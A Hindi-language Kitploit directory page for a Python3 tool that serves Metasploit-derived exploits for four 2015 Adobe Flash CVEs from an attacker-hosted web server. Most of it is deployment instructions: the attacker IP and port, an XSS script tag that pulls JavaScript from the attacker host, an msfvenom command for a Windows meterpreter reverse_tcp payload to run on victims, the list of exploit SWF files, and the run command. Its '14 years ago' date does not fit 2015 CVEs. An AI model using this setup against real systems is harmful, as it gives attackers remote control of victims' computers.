Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Adobe-Flash-Exploits_17-18 — Adobe Flash की कमजोरियों CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit एक्सप्लॉइट्स को Python3 स्क्रिप्ट में परिवर्तित किया गया। | Kitploit
उपकरण/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Adobe Flash की कमजोरियों CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit एक्सप्लॉइट्स को Python3 स्क्रिप्ट में परिवर्तित किया गया।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

Adobe Flash Exploits CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 Python3 स्क्रिप्ट

Adobe Flash भेद्यताओं CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit exploits को Python3 स्क्रिप्ट में परिवर्तित किया गया।

जानकारी

यह स्क्रिप्ट एक वेब सर्वर होस्ट करेगी जो एक बार में निम्नलिखित Adobe Flash भेद्यताओं में से एक का शोषण कर सकती है:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

निष्पादन

आपको अपनी आवश्यकताओं के अनुसार exploit.py में परिवर्तन करने होंगे (यहाँ रूपरेखा)।

संशोधन

  • hostname = "192.168.1.100"
    • यह हमलावर सिस्टम पर एक IP है जो शोषण वेब सर्वर को होस्ट करेगा।
  • serverPort = 8080
    • यह हमलावर सिस्टम पर पोर्ट है जो शोषण वेब सर्वर को होस्ट करेगा।
  • xss = False
    • यदि True पर सेट किया जाता है, तो पीड़ित का सर्वर पर पहला अनुरोध JavaScript के रूप में माना जाता है:
      • XSS इंजेक्ट का उदाहरण:
        • <script src="http://192.168.1.100:8080/"></script>
      • हमला पथ:
        • पीड़ित अनुरोध 1 -> XSS असुरक्षित सर्वर:
          • पीड़ित एक दूरस्थ सर्वर पर XSS इंजेक्ट तक पहुँचता है जो एक JavaScript फ़ाइल का अनुरोध करता है (अनुरोध 2 देखें)।
        • पीड़ित अनुरोध 2 -> हमलावर सिस्टम पर JavaScript स्रोत।
        • पीड़ित अनुरोध 3 -> दुर्भावनापूर्ण swf फ़ाइल।
    • यदि False पर सेट किया जाता है, तो पीड़ित का सर्वर पर पहला अनुरोध HTML के रूप में माना जाता है:
      • उदाहरण:
        • http://192.168.1.100:8080/
      • हमला पथ:
        • पीड़ित अनुरोध 1 -> हमलावर सिस्टम पर HTML फ़ाइल।
        • पीड़ित अनुरोध 2 -> दुर्भावनापूर्ण swf फ़ाइल।
  • base64Payload = "..."
    • यह base64 पेलोड है जो पीड़ित सिस्टम पर निष्पादित किया जाएगा।
    • अपनी आवश्यकताओं के अनुसार नीचे दिए गए उदाहरण कमांड को संशोधित करें और अपना पेलोड उत्पन्न करें:
      • उदाहरण:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • ध्यान दें: एकमात्र पेलोड जो मेरे लिए काम करता है वह windows/meterpreter/reverse_tcp है।

  • swfFile = swfFileList['37368']
    • पीड़ित सिस्टम का शोषण करने के लिए उपयोग करने हेतु Adobe Flash शोषण swf फ़ाइल चुनें:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

चलाएँ

दुर्भावनापूर्ण swf फ़ाइलों के समान निर्देशिका में, Adobe Flash शोषण स्क्रिप्ट को निष्पादित करने के लिए निम्नलिखित कमांड चलाएँ:

  • python3 exploit.py

संदर्भ:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

टूल डाउनलोड करें